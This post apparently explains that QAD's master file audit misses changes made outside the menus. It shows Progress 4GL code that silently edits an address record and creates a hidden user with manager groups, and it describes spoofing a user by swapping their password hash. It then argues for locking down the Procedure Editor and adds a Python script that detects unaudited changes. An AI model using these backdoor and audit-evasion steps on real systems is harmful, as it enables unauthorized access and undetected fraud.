Master File Auditing limitations
OK, it's definite. The master file audit system in QAD does not track changes made outside the menus. So if I get into a Procedure Editor that can compile I can do something like this:
find ad_mstr where ad_addr = "C00100A2".
assign ad_city = "Pittsburgh" ad_state = "PA".
...and it will never show up in the master file audit system. Likewise:
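/* look up a menu entry so its group list can be copied */
find mnd_det where mnd_nbr = "36" and mnd_select = "3" no-lock no-error.
/* the record is created in usr_mstr; usr_userid is one of its fields */
create usr_mstr.
assign
    usr_userid = "me"
    usr_passwd = encode("me")
    usr_lang = "us"
    usr_groups = if avail mnd_det then mnd_canrun
                 else "IS,IT,MANAGER".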
...will allow me to get into the system as "me". But a really suave hacker would scan the usr_mstr table, decide who he wanted to spoof and write down the 16-letter encrypted usr_passwd. Then he'd change it, log in, do his dirty work and switch back afterward.
This is another reason to lock down the Procedure Editor.
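Because the audit system only sees menu activity, one way to catch the changes described above after the fact is to compare periodic table snapshots with the audit trail and flag every difference that has no audit entry. This is an added example, not code from the original post or from QAD; the snapshot and audit-export formats, the function names and all sample values are assumptions constructed for illustration.

```python
# Reconcile two table snapshots against the master file audit trail.
# Assumed formats (hypothetical, not QAD's): a snapshot is {key: {field: value}},
# and the audit export is a set of (table, key, field) tuples, with field "*"
# marking an audited create or delete.

WATCHED = {
    "usr_mstr": ("usr_passwd", "usr_groups"),
    "ad_mstr": ("ad_city", "ad_state"),
}

def unaudited_changes(table, before, after, audit):
    """Return (table, key, kind, field) for every difference with no audit entry."""
    findings = []
    for key in sorted(before.keys() | after.keys()):
        old, new = before.get(key), after.get(key)
        if old is None or new is None:
            kind = "created" if old is None else "deleted"
            if (table, key, "*") not in audit:
                findings.append((table, key, kind, None))
            continue
        for field in WATCHED[table]:
            if old.get(field) != new.get(field) and (table, key, field) not in audit:
                findings.append((table, key, "changed", field))
    return findings

# Constructed sample data; hash values are placeholders, not real ENCODE output.
USERS_BEFORE = {"jsmith": {"usr_passwd": "HASH-1", "usr_groups": "IS"}}
USERS_AFTER = {
    "jsmith": {"usr_passwd": "HASH-2", "usr_groups": "IS"},
    "me": {"usr_passwd": "HASH-3", "usr_groups": "IS,IT,MANAGER"},
}
ADDR_BEFORE = {
    "C00100A2": {"ad_city": "Cleveland", "ad_state": "OH"},
    "C00200B1": {"ad_city": "Erie", "ad_state": "PA"},
}
ADDR_AFTER = {
    "C00100A2": {"ad_city": "Pittsburgh", "ad_state": "PA"},
    "C00200B1": {"ad_city": "Scranton", "ad_state": "PA"},
}
# Only the C00200B1 edit went through the menus, so only it was audited.
AUDIT = {("ad_mstr", "C00200B1", "ad_city")}

def run_report():
    return (unaudited_changes("usr_mstr", USERS_BEFORE, USERS_AFTER, AUDIT)
            + unaudited_changes("ad_mstr", ADDR_BEFORE, ADDR_AFTER, AUDIT))

if __name__ == "__main__":
    for finding in run_report():
        print(finding)
```

A snapshot comparison only sees state that persists between two snapshots, so a usr_passwd value that is changed and restored between runs will not appear; that case needs logging at write time.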